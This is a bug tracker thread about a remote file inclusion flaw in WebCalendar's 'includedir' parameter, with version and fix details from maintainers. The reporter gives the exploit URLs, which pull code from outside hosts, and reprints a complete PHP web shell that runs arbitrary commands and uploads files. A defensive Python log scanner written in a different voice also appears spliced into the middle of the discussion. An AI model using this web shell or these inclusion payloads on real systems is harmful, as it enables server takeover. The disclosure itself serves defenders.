#2149 Major Security Hole

Labels: Security_Hole
Status: closed-fixed
Owner: Ray Jones
Category: Security (98)
Priority: 9
Updated: 2014-09-15
Created: 2007-09-07
Creator: Chad Berg
Private: No

So my web server got hacked this week and after taking some time to trace where it came from I discovered it was from WebCalendar. I am running 1.1.3 and I tried upgrading to 1.1.4, but the same issue exists. They were able to create a directory and start an IRC bot. It eventually killed my valid web server and used a tremendous amount of bandwidth.

A carefully designed page can take advantage of the includedir argument and use it to gain access to the system. Here is the URL that was accessed to take over my system:

month.php//ws/login.php?noSet=0&includedir=http://geocities.com/rythmzero/tool/porno.txt?

I have included the code from the above listed geocities web page in case it becomes unavailable (I reported it to Yahoo).

<title>#the-one PHP Injection</title>
<style type="text/css">
<!--
body {
background-color: #FFFFF;
}
-->
</style><?php

set_magic_quotes_runtime(0);

print "<style>body{font-family:trebuchet ms;font-size:16px; color:blue;}hr{width:100%;height:2px;}</style>";
print "<center><h1>#the-one</h1></center>";
print "<center><h1>Touch Your System</h1></center>";
print "<marquee><font color=blue size=5> greatz to c1pmunk - ndOst - YOgiOH - ilalang23 </marquee></font>";
print "<hr><hr>";

$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;

if( $currentWD == "" ) {
$currentWD = $SCWD;
}

print "<table>";
print "<tr><td><b>You are :</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
print "<tr><td><b>Server :</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
print "<tr><td><b>System :</b></td><td>$UName</td></tr>";
print "<tr><td><b>Permissions :</b></td><td>$UserID</td></tr>";
print "</table>";

print "<hr><hr>";

if( $_POST['_act'] == "List files!" ) {
$currentCMD = "lwp-download";
}

print "<form method=post enctype=\"multipart/form-data\"><table>";

print "<tr><td><b>Command :</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Crot!\"></td></tr>";

print "<tr><td><b>Directory :</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"Crit!\"></td></tr>";

print "<tr><td><b>Upload :</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Crut!\"></td></tr>";

print "</table></form><hr><hr>";

$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);

if( $_POST['_act'] == "Upload!" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print "<center><b>Error while uploading file!</b></center>";
} else {
print "<center><pre>";
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
print "</pre><b>File uploaded successfully!</b></center>";
}
} else {
print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system($currentCMD);
print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>#the-one @ DALnet</b></center>";
}

exit;

?>

Discussion

  • Chad Berg
    Chad Berg
    2007-09-07

    Copy of the code to gain access
  • Chad Berg
    Chad Berg
    2007-09-07

    • priority: 5 --> 9
  • revrob
    revrob
    2007-09-11

    Logged In: YES
    user_id=1887714
    Originator: NO

    Same here - my web site got suspended by my administrator because of a very similar attack (I was using their installed v1 ORC3 WebCalendar which I know is an older version). I now have my site back but without the calendar application. This was also an IRC relay, and it crashed a whole server. Date was also the same - 6-7th September. I don't have the technical details but have referred my domain host to this thread.

  • Craig Knudsen
    Craig Knudsen
    2007-09-12

    Logged In: YES
    user_id=14386
    Originator: NO

    Do you know if your site has "register_globals" set to 1/On or 0/Off? (This is a PHP setting typically set in a php.ini file, or you can override it in a .htaccess file in your directory.)

    If you're not sure, you can create a test.php file that contains the following to show all your PHP settings:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html>
    <head>
    </head>
    <body>
    <?php phpinfo(); ?>
    </body>
    </html>

  • Craig Knudsen
    Craig Knudsen
    2007-09-12

    • status: open --> pending-fixed
  • Craig Knudsen
    Craig Knudsen
    2007-09-12

    Logged In: YES
    user_id=14386
    Originator: NO

    See the following thread, which includes the fix.

    https://sourceforge.net/forum/forum.php?thread_id=1818408&forum_id=11588

    It is currently fixed in CVS (HEAD and REL_1_2 branches).

    Version 1.0.5 is not vulnerable.

    Version 1.1.2, 1.1.3 and 1.1.4 ARE vulnerable when register_globals is On.

  • revrob
    revrob
    2007-09-12

    Logged In: YES
    user_id=1887714
    Originator: NO

    Further to my post below - I did a testglobals and register globals were OFF/OFF. WebCalendar is now deleted and I am going to wait for the 1.1.5 release and then my host will install it and we will test it. There are still plenty of search requests on the logs for my (now deleted) WebCalendar directory. Thank you for acting so fast on this one.

  • Chad Berg
    Chad Berg
    2007-09-13

    • status: pending-fixed --> open-fixed
  • Chad Berg
    Chad Berg
    2007-09-13

    Logged In: YES
    user_id=368575
    Originator: YES

    Yes register_globals is set to 1 (on). I just installed 1.1.5 and it looks like that issue is fixed. It also appears version 1.0.4 is not vulnerable to this issue as well.

    Thanks for the quick response!

  • Anonymous
    Anonymous
    2007-10-05

    Logged In: YES
    user_id=1905879
    Originator: NO

    Question - I am running 1.0.4 (upgrading right now to 1.0.5) but I was hacked as follows:

    12.96.164.115 - - [03/Oct/2007:17:53:01 -0400] "GET /WEBCalendar//tools/send_reminders.php?noSet=0&includedir=http://preklady-anglictiny.info/advokati/templates/zak_blueeye.jpg? HTTP/1.1" 200 33473 "-" "Mozilla 8.0"

    Is this the same vulnerability and fixed in 1.0.5?

    Thanks

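    The access-log line quoted above is the kind of trace a defender can hunt for: a WebCalendar script requested with an includedir parameter whose value is a remote URL. The following is an added example (not code from WebCalendar or from anyone in this thread) that scans Apache combined-format log lines for that pattern; the log lines, IPs and the attacker.example hostname are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format, modelled on the
# request quoted in this thread (IPs and hostnames are placeholders).
SAMPLE_LOG = """\
192.0.2.10 - - [03/Oct/2007:17:53:01 -0400] "GET /WEBCalendar//tools/send_reminders.php?noSet=0&includedir=http://attacker.example/shell.txt? HTTP/1.1" 200 33473 "-" "Mozilla 8.0"
192.0.2.11 - - [07/Sep/2007:09:12:44 -0400] "GET /calendar/month.php//ws/login.php?noSet=0&includedir=http%3A%2F%2Fattacker.example%2Fshell.txt%3F HTTP/1.1" 200 1200 "-" "curl/7.15"
192.0.2.12 - - [07/Sep/2007:09:13:02 -0400] "GET /calendar/month.php?year=2007&month=9 HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
192.0.2.13 - - [07/Sep/2007:09:14:10 -0400] "POST /calendar/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Request parameters that WebCalendar trusted when register_globals was On
# (see the thread); a remote URL in one of them is a file-inclusion attempt.
WATCHED_PARAMS = {"includedir"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def find_rfi_attempts(log_text):
    """Return (ip, status, path, param, value) for every request whose
    watched parameter carries a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values, so "http%3A%2F%2F..." is caught too
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name in WATCHED_PARAMS and value.lower().startswith(REMOTE_SCHEMES):
                hits.append((m.group("ip"), int(m.group("status")), parts.path, name, value))
    return hits


if __name__ == "__main__":
    for ip, status, path, name, value in find_rfi_attempts(SAMPLE_LOG):
        # A 200 here means the server answered the request normally, which on a
        # vulnerable version means the remote file was fetched and executed.
        print(f"{ip} {status} {path} {name}={value}")
```

The same scan can be pointed at a real access log by reading the file into find_rfi_attempts; any hit against a version listed as vulnerable in this thread is a reason to treat the host as compromised, not just to patch it.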
  • Ray Jones
    Ray Jones
    2007-11-14

    Logged In: YES
    user_id=1090373
    Originator: NO

    These variables have been blocked from URL input in v1.0.5. We went a step further in v1.1.6 and totally removed the offending variables, making them CONSTANTS instead.

    -Ray

  • Ray Jones
    Ray Jones
    2007-11-14

    • assigned_to: cknudsen --> umcesrjones
    • status: open-fixed --> pending-fixed
  • Logged In: YES
    user_id=1312539
    Originator: NO

    • status: pending-fixed --> closed-fixed

    This Tracker item was closed automatically by the system. It was
    previously set to a Pending status, and the original submitter
    did not respond within 30 days (the time period specified by
    the administrator of this Tracker).